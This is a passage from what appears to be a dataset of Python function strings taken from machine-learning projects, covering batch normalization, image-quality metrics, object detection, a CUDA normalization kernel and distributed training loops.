loader:\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n b = input_var.data.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n model(input_var)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))", "def get_distribution(self):\n self.calc()\n proc_blocks = self.proc_blocks\n proc_num_particles = self.particle_loads\n cell_proc = LoadBalancer.get_block_proc(proc_blocks=proc_blocks)\n return cell_proc, proc_num_particles", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = 
self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def fast_rcnn_detection(self):\n\n\n # (batch_size, num_proposal, 7, 7, channels)\n pooled_feature = self.get_rois(self.rpn_proposals_boxes)\n fast_rcnn_predict_boxes, fast_rcnn_predict_scores = self.fast_rcnn_net(pooled_feature, False)\n\n with tf.variable_scope(\"fast_rcnn_detection\"):\n\n fast_rcnn_softmax_scores = slim.softmax(fast_rcnn_predict_scores) # [-1, num_classes]\n\n # gain the highest category and score and bounding box\n fast_rcnn_categories = tf.argmax(fast_rcnn_softmax_scores, axis=2, output_type=tf.int32) # (N,)\n row_index = tf.range(0, tf.shape(fast_rcnn_categories)[1])\n row_index = tf.expand_dims(row_index, 0)\n multi_row_index = tf.tile(row_index, [self.config.PER_GPU_IMAGE, 1])\n multi_row_index = tf.expand_dims(multi_row_index, axis=-1)\n expand_fast_rcnn_categories = tf.expand_dims(fast_rcnn_categories, axis=-1)\n index = tf.concat([multi_row_index, expand_fast_rcnn_categories], axis=-1)\n fast_rcnn_categories_bboxs = boxes_utils.batch_slice([fast_rcnn_predict_boxes, index],\n lambda x, y: tf.gather_nd(x, y),\n self.config.PER_GPU_IMAGE)\n\n fast_rcnn_categories_scores = tf.reduce_max(fast_rcnn_softmax_scores, axis=2, keepdims=False)# (N,)\n\n detections = self.fast_rcnn_proposals(self.rpn_proposals_boxes,\n fast_rcnn_categories_bboxs,\n fast_rcnn_categories,\n fast_rcnn_categories_scores,\n self.window)\n\n return detections", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(\n individual_losses, params, concat=True\n )\n hist, edges = self._compute_histogram(individual_gradients)\n\n return {\"hist\": hist.float(), \"edges\": edges}", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def 
_shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1,\n model='resnet50',\n num_warmup_batches=5,\n num_batches=50,\n distortions=False,\n forward_only=True,\n device='cpu',\n data_format='NHWC',\n num_intra_threads=0)", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def main():\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # pylint: disable=E1101\n\n comm = MPI.COMM_WORLD\n\n # Use MPI for parallel evaluation\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n env_fns, env_names = create_eval_envs()\n\n env = AllowBacktracking(env_fns[rank](stack=False, scale_rew=False))\n env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)\n with tf.Session(config=config) as sess:\n dqn = DQN(*rainbow_models(sess,\n env.action_space.n,\n gym_space_vectorizer(env.observation_space),\n min_val=-200,\n max_val=200))\n player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)\n optimize = dqn.optimize(learning_rate=1e-4)\n sess.run(tf.global_variables_initializer())\n\n reward_hist = []\n total_steps = 0\n def _handle_ep(steps, rew, env_rewards):\n nonlocal total_steps\n total_steps += steps\n reward_hist.append(rew)\n if total_steps % 1 == 0:\n avg_score = sum(reward_hist[-100:]) / len(reward_hist[-100:])\n\n\t\t\t# Global Score\n global_score = np.zeros(1)\n local_score = np.array(avg_score)\n print(\"Local Score for \" + env_names[rank] + \" at episode \" + str(len(reward_hist)) + \" with timesteps: \" + str(total_steps) + \": \" + str(local_score))\n comm.Allreduce(local_score, global_score, op=MPI.SUM)\n global_score /= size\n if rank == 0:\n print(\"Global Average Score at episode: \" + str(len(reward_hist)) + \": \" + str(global_score))\n\n\n dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.\n player=player,\n replay_buffer=PrioritizedReplayBuffer(500000, 0.5, 0.4, epsilon=0.1),\n optimize_op=optimize,\n train_interval=1,\n target_interval=8192,\n batch_size=32,\n min_buffer_size=20000,\n handle_ep=_handle_ep,\n save_interval=None,\n restore_path='./checkpoints_rainbow/model-10' # Model to be evaluated\n )", "def collect_via_nvidia_smi(self, stats_config):\n raw_output = self.run_command([\n '--query-gpu={query_gpu}'.format(query_gpu=','.join(stats_config)),\n '--format=csv,nounits,noheader'\n ])\n\n if raw_output is None:\n return\n\n results = raw_output[0].strip().split(\"\\n\")\n for result in results:\n stats = result.strip().split(',')\n assert len(stats) == len(stats_config)\n index = stats[0]\n for stat_name, metric in izip(stats_config[1:], stats[1:]):\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)", "def calc_contributions(self):\n\n if self.iterations >= self.statistics_batch_num:\n return\n for wrapper in 
self.get_modules_wrapper():\n filters = wrapper.module.weight.size(0)\n contribution = (wrapper.module.weight*wrapper.module.weight.grad).data.pow(2).view(filters, -1).sum(dim=1)\n if wrapper.contribution is None:\n wrapper.contribution = contribution\n else:\n wrapper.contribution += contribution\n\n self.iterations += 1", "def multi_gpu_generate_rpn_on_dataset(\n args, dataset_name, proposal_file, num_images, output_dir):\n # Retrieve the test_net binary path\n binary_dir = envu.get_runtime_dir()\n binary_ext = envu.get_py_bin_ext()\n #TODO note that code can only be run from root_dir!!\n binary = os.path.join(binary_dir, 'tools/test_net' + binary_ext)\n assert os.path.exists(binary), 'Binary \\'{}\\' not found'.format(binary)\n\n # Pass the target dataset via the command line\n opts = ['TEST.DATASETS', '(\"{}\",)'.format(dataset_name)]\n\n # Run inference in parallel in subprocesses\n outputs = subprocess_utils.process_in_parallel(\n 'rpn_proposals', num_images, binary, output_dir,\n args.load_ckpt, args.load_detectron, opts\n )\n\n # Collate the results from each subprocess\n boxes, scores, ids = [], [], []\n for rpn_data in outputs:\n boxes += rpn_data['boxes']\n scores += rpn_data['scores']\n ids += rpn_data['ids']\n rpn_file = os.path.join(output_dir, 'rpn_proposals.pkl')\n cfg_yaml = yaml.dump(cfg)\n save_object(\n dict(boxes=boxes, scores=scores, ids=ids, cfg=cfg_yaml), rpn_file\n )\n logger.info('Wrote RPN proposals to {}'.format(os.path.abspath(rpn_file)))\n return boxes, scores, ids, rpn_file", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def __call__(self, epoch, update):\n count = 0\n ii = 1\n\n gradients_list = []\n metrics_list = []\n from_list 
= []\n step_list = []\n global_update_list = []\n\n while True:\n i,p = next(self.gen)\n if p.poll():\n count += 1\n grads =[]\n for i,fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs*4)\n grads.append(np.ndarray(self.shapes[i],np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv() #only marginal gains her in the e-05s not worth the complexity to doing it with recv_bytes\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n else:\n ii += 1\n if ii %self.learners == 0:\n time.sleep(0.0001)\n\n if self.warm_start and self.epochs >= epoch:\n if count == self.learners:\n return gradients_list, from_list, global_update_list ,step_list, metrics_list, 0, 2\n else:\n if count == self.num:\n return gradients_list, from_list, global_update_list,step_list, metrics_list, 0, 2", "def _get_fprop_lrn(clss, compute_capability):\n code = r\"\"\"\n%(common)s\n\n__global__ void spool_fprop_lrn(\n const %(type)s* I, %(type)s* O, %(type)s* A,\n float alpha, float beta, float ascale, float bpower, int flags,\n int N, int W, int H, int D, int C,\n int WN, int HWN, int DHWN, int P, int Q,\n int magic_P, int shift_P, int QN, int PQN, int MPQN,\n int pad_c, int pad_d, int pad_h, int pad_w,\n int str_c, int str_d, int str_h, int str_w,\n int S, int RS, int RST, int JRST,\n int magic_S, int shift_S,\n int magic_RS, int shift_RS, int magic_RST, int shift_RST,\n int supP, int supQ, int shlP, int maskP, int shrP,\n int shlQ, int maskQ, int shrQ, int maskN, int shrN\n %(stats_args)s\n )\n{\n __shared__ float rcpWindowSize;\n extern __shared__ int lut[];\n\n int tid = threadIdx.x;\n\n // paralellism is over QMPK dimensions (output pixels and ofm's)\n int n = tid;\n int q = blockIdx.x;\n int mp = blockIdx.y;\n int k = blockIdx.z;\n\n int m = mp * magic_P; m >>= shift_P;\n int p = mp - m*P;\n\n // zigzag q back and forth to improve L2 cache perf\n if (p & 1)\n q = Q - q - 1;\n\n const %(type)s* IonO = I; // input pixel at output location\n I += n;\n IonO += k*MPQN + m*PQN + p*QN + q*N + n;\n O += k*MPQN + m*PQN + p*QN + q*N + n;\n A += k*MPQN + m*PQN + p*QN + q*N + n;\n\n float O_val = beta != 0.0f ? %(cvt)s(__ldg(O)) : 0.0f;\n\n if (tid < 32)\n {\n int kj = k * str_c - pad_c;\n int mt = m * str_d - pad_d;\n int pr = p * str_h - pad_h;\n int qs = q * str_w - pad_w;\n\n int window_size = 0;\n int jrst = tid;\n // this loop generates the LUT (same for pooling and normalization)\n while (jrst < JRST)\n {\n int j = jrst * magic_RST; j >>= shift_RST;\n int rst = jrst - j * RST;\n\n int t = rst * magic_RS; t >>= shift_RS;\n int rs = rst - t * RS;\n\n int r = rs * magic_S; r >>= shift_S;\n int s = rs - r*S;\n\n int x = qs + s;\n int y = pr + r;\n int z = mt + t;\n int c = kj + j;\n\n bool bounds_x = x >= 0 && x < W;\n bool bounds_y = y >= 0 && y < H;\n bool bounds_z = z >= 0 && z < D;\n bool bounds_c = c >= 0 && c < C;\n bool in_bounds = bounds_x && bounds_y && bounds_z && bounds_c;\n\n // Count the total valid slices\n window_size += __popc(__ballot(in_bounds));\n\n int sliceI = c*DHWN + z*HWN + y*WN + x*N;\n\n lut[jrst] = in_bounds ? 
sliceI : -1;\n jrst += 32;\n }\n\n if(tid == 0)\n {\n //rcpWindowSize = 1.0f / (float)window_size;\n rcpWindowSize = (float)RST/(float)JRST;\n }\n }\n __syncthreads();\n\n float out = 0.0f;\n float denom;\n float sumsquare = 0.0f;\n float input = 0.0f;\n int jrst = 0;\n while (jrst < JRST)\n {\n int slice0 = lut[jrst + 0];\n int slice1 = lut[jrst + 1];\n int slice2 = lut[jrst + 2];\n int slice3 = lut[jrst + 3];\n\n // TODO: May not need to load all slices if they are not used.\n input = jrst + 0 < JRST && slice0 >= 0 ? %(cvt)s(__ldg(I + slice0)) : 0.0f;\n sumsquare += jrst + 0 < JRST && slice0 >= 0 ? input * input: 0.0f;\n input = jrst + 1 < JRST && slice1 >= 0 ? %(cvt)s(__ldg(I + slice1)) : 0.0f;\n sumsquare += jrst + 1 < JRST && slice1 >= 0 ? input * input: 0.0f;\n input = jrst + 2 < JRST && slice2 >= 0 ? %(cvt)s(__ldg(I + slice2)) : 0.0f;\n sumsquare += jrst + 2 < JRST && slice2 >= 0 ? input * input: 0.0f;\n input = jrst + 3 < JRST && slice3 >= 0 ? %(cvt)s(__ldg(I + slice3)) : 0.0f;\n sumsquare += jrst + 3 < JRST && slice3 >= 0 ? input * input: 0.0f;\n\n jrst += 4;\n }\n\n denom = (1 + ascale*sumsquare*rcpWindowSize);\n out = %(cvt)s(__ldg(IonO)) / powf(denom, bpower);\n\n\n // convert back to fp to write out\n %(type)s temp_out = %(cvt_out)s( %(mul_by_scale)s (out*alpha + O_val*beta));\n\n // predicate write with no-op flag\n if (!(flags & 1)) {\n *O = temp_out;\n *A = %(cvt_out)s( %(mul_by_scale)s denom ); // write the denomiantor to address\n }\n\n // collect max abs stats\n int intermediate_max = max_abs(0, temp_out); // compute abs\n %(atomic_max)s\n}\n\"\"\"\n\n template_vals = prepare_template_vals(clss, compute_capability)\n code = code % template_vals\n module = SourceModule(code)\n kernel = module.get_function(\"spool_fprop_lrn\")\n kernel.prepare(\"3P 4f 34I 10I\" + flex_sig(clss[0])) # add superblocking parameter\n return kernel", "def _compute_outputs(self, *args, **kwargs):\n pass\n # self.outputs = self.model(input_ids=self.input_ids, masked_lm_labels=self.input_ids)\n # self.logits = self.outputs[0][0]\n # self.probs = torch.softmax(self.logits, 1)", "def run_bp(self, niter):\n for v in self.vs.values():\n v.init_received()\n for f in self.fs:\n f.init_received()\n marg = {v: self.get_marginal(v) for v in self.vs}\n for it in range(niter):\n for v in self.vs.values():\n v.send()\n for f in self.fs:\n f.send()\n for v in self.vs:\n marg[v] = np.vstack((marg[v], self.get_marginal(v)))\n domains = {v.name: v.orig_domain for v in self.vs.values()}\n return (marg, domains, self.vobs)", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(individual_losses, params)\n layerwise = [\n self._compute_histogram(p, igrad)\n for p, igrad in zip(params, individual_gradients)\n ]\n\n hist = sum(out[0] for out in layerwise)\n edges = layerwise[0][1]\n\n result = {\"hist\": hist, \"edges\": edges}\n\n if self._keep_individual:\n result[\"param_groups\"] = len(params)\n\n for idx, (hist, edges) in enumerate(layerwise):\n result[f\"param_{idx}\"] = {\"hist\": hist, \"edges\": edges}\n\n return result", "def update_probs(self, measure, p, enemy_net = False):\n tmp_net = []\n net_size = len(self.net) \n if not enemy_net:\n net = self.net\n else:\n net = self.enemy_net\n #Maps a given color to its corresponding column in the color's \n #probability table.\n if measure == GREEN:\n color = 0\n elif measure == YELLOW:\n color = 1\n elif measure == ORANGE:\n color = 2\n elif measure == 
RED:\n color = 3\n #Obtains new probabilities by using the distance between the\n #observed position (the one measured) and any other position.\n for j in range(0, net_size):\n distance = self.__get_distance(p, j)\n if distance == 0: #When updating the measured position's probability.\n tmp_net.append(net[j].value * self.ct[0][color])\n elif distance == 1: #When updating an adjacent position to the one measured.\n tmp_net.append(net[j].value * self.ct[1][color])\n elif distance == 2: #When updating a position at two cells from the one measured.\n tmp_net.append(net[j].value * self.ct[2][color])\n elif distance == 3: #When updating a position at three cells from the one measured.\n tmp_net.append(net[j].value * self.ct[3][color])\n else: #When updating a position at four or more cells from the one measured.\n tmp_net.append(net[j].value * self.ct[4][color])\n #Obtains summation of new probabilities in order to execute \n #a posterior normalization.\n total = sum(tmp_net)\n #Normalizes new probabilities and assigns them to its \n #corresponding position.\n for i in range(0, net_size):\n net[i].value = tmp_net[i]/total", "def update_concentrations_batch(self): \n #--- Update the cell concentrations ---\n # dX_i/dt = mu_i*(1-rmp/100)*X_i*(1 - sum(i,(1-rmp/100)X(i))/carrying_capacity) or \n # (X_i(t+dt) - X_i(t))/dt = mu*(1-rmp/100)*X_i(t)*(1 - sum(i,(1-rmp/100)*X_i(t))/carrying_capacity)\n # where rmp is the random mortality percentage\n # If concentration is negative set it to zero\n members_gDW_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_gDW_per_ml = 1 - members_gDW_per_ml_total/self.carrying_capacity['gDW_per_ml']\n if len([member for member in self.community_members if member.organism.cells_per_ml != None]) == len(self.community_members):\n members_cells_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_cells_per_ml = 1 - members_cells_per_ml_total/self.carrying_capacity['cells_per_ml']\n\n for member in self.community_members:\n # We always need gDW_per_ml to update compound concentrations but\n # providing cells_per_ml is optional\n member.organism.gDW_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1-self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t]*self._logisticG_factor_gDW_per_ml*self._dt + member.organism.gDW_per_ml[self._t],0)\n\n if member.organism.cells_per_ml is not None:\n member.organism.cells_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t]*self._logisticG_factor_cells_per_ml*self._dt + member.organism.cells_per_ml[self._t],0)\n\n # Total death rate (** newly added for DMMM_mortality **)\n if member.organism.mu[self._t] < 0:\n # In thise case random_mortality_rate has already been incorporated into mu\n # (see DMMM.py)\n member.organism.total_death_rate[self._t] = member.organism.mu[self._t] \n else:\n member.organism.total_death_rate[self._t] = member.organism.random_mortality_rate\n\n\n #--- Update shared compound concentrations ---\n # dC/dt = f where, f = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool_rate\n # (C(t+dt) - c(t))/dt = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool \n # where, dead_pool_rate = sum(k,-self.cell_pool_factor*cell_pool_concentration_k*total_death_rate_k*X_k)\n # 
Here, cell_pool_concentration is the concentration of the compound pool \n # per gDW or per cells, which should have already been assigned to each \n # shared compound. The minus sign is because total_death_rate is negative\n # while dead_pool_rate must be non-negative. Here, self.cell_pool_factor is\n # the factor that should be multiplied by concentration of that compound \n # (this is because sometimes we want to explore how the growth is affected if \n # the cell pool is higher than the ones reported experimentally)\n total_cmps_conc = sum([cmp.concentration[self._t] for cmp in self.shared_compounds])\n self._logisticG_factor_cmps = 1 - total_cmps_conc/self.carrying_capacity['compounds_mM']\n self._f = dict([(cmp,None) for cmp in self.shared_compounds])\n\n if not hasattr(self,'cell_pool_factor'):\n self.cell_pool_factor = 1\n\n for shared_cmp in self.shared_compounds:\n dead_pool_rate = -sum([self.cell_pool_factor*shared_cmp.cell_pool_concentration[member.organism.id]*member.organism.total_death_rate[self._t]*1000*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n if dead_pool_rate < 0:\n raise userError('dead_pool_rate is negative')\n\n f = sum([r.flux[self._t]*1000*r.model.organism.gDW_per_ml[self._t] for r in shared_cmp.reactions]) + dead_pool_rate\n self._f[shared_cmp] = f\n\n conc = f*self._logisticG_factor_cmps*self._dt + shared_cmp.concentration[self._t]\n\n if conc >= 0 or (conc < 0 and abs(conc) <= 1e-9):\n conc = max(conc,0)\n\n shared_cmp.concentration[self._t + self._dt] = conc", "def bn_update(loader, model, device):\n if not check_bn(model):\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print('no bn in model?!')\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>!')\n # return model\n\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n\n model = model.to(device)\n pbar = tqdm(loader, unit=\"samples\", unit_scale=loader.batch_size)\n for sample in pbar:\n inputs, targets, target_lengths = sample['input'].to(device), sample['label'].to(device), sample['label_length'].to(device)\n\n inputs = inputs.to(device)\n b = inputs.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n # model(inputs)\n # TODO:\n model(inputs, False, targets, target_lengths, 275, test_dataset.tokenizer)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))\n return model", "def benchmark_ng_xla_batch64_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, batch_size=64, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n model='resnet50', batch_size=128, distortions=False,\n optimizer='momentum')", "def batchnorm_compute(self):\n self.batchnorm_compute_tiling_wh_single_c()\n\n self.tik_instance.BuildCCE(kernel_name=self.kernel_name,\n inputs=[self.input_gm,\n self.gamma_gm,\n self.beta_gm],\n outputs=[self.output_gm],\n flowtable=[self.input_n, self.input_c,\n self.input_h, self.input_w,\n self.inputtype, self.output_n,\n self.output_c, self.output_h,\n self.output_w, self.outputtype,\n self.gamma_c, self.gammatype,\n self.beta_c, self.betatype,\n self.param1, self.param2,\n self.param3, self.param4,\n self.param5, self.param6,\n self.param7, self.param8,\n self.param9, self.param10],\n enable_l2=True,\n config={\"double_buffer_non_reuse\": True,\n \"out_of_bound_sync_check\": True})\n return 
self.tik_instance", "def calculate_batch_metrics(self):\n pass", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(_get_gp_ucb_dim(gp), anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" A UCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, _get_gp_ucb_dim(gp))))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n #######################################################################\n #Compute mean and variance of each element of the data.\n sample_mean = np.mean(x,axis = 0)\n sample_var = np.var(x,axis = 0)\n #Normalize\n x_normalized = (x - sample_mean) / (np.sqrt(sample_var + eps))\n #scale and shift.\n out = x_normalized * gamma + beta\n #Update running mean and variance.\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(sample_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. 
#\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n #Normalize with running mean and var.\n x_normalized = (x - running_mean) / (np.sqrt(running_var + eps))\n #scale and shift.\n out = gamma * x_normalized + beta\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(running_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def run(self):\n # Single GPU flag\n single_gpu = True if size()==1 else False\n print_rank(f\"Single GPU flag Client: {single_gpu}\", loglevel=logging.DEBUG)\n \n if not single_gpu:\n while True: # keeps listening for incoming server calls\n\n # Initialize tensors -- required by torch.distributed\n command, client_idx, mode = 0, 0, 0 # int\n lr, nround = torch.zeros(1), torch.zeros(1) # float\n\n # Read command\n command = _recv(command)\n print_rank(f\"Command received {command} on worker {rank()}\", loglevel=logging.DEBUG)\n\n # Receive server data -- lr, model_params\n if command == COMMAND_UPDATE:\n print_rank(f\"COMMMAND_UPDATE received {rank()}\", loglevel=logging.DEBUG) \n lr = _recv(lr, 0)\n model_params = _recv_gradients(0)\n nround = _recv(nround, 0)\n server_data = (lr, model_params, int(nround))\n print_rank(f\"Received lr: {lr} and n_params: {len(model_params)} - round {nround}\", loglevel=logging.DEBUG)\n \n elif command == COMMAND_TRAIN:\n print_rank(f\"COMMMAND_TRAIN received {rank()}\", loglevel=logging.DEBUG)\n \n # Init profiler in training worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive client id from Server\n client_idx = _recv(client_idx)\n print_rank(f\"Cliend idx received from Server: {client_idx}\", loglevel=logging.DEBUG)\n\n # Instantiate client\n client_to_process = Client(\n [client_idx],\n self.config,\n self.config['client_config']['type'] == 'optimization') \n \n # Execute Client.get_data()\n client_data = client_to_process.get_client_data()\n\n # Execute Client.process_round()\n output = client_to_process.process_round(client_data, server_data, self.model, self.data_path)\n\n # Send output back to Server\n if dist.get_backend() == 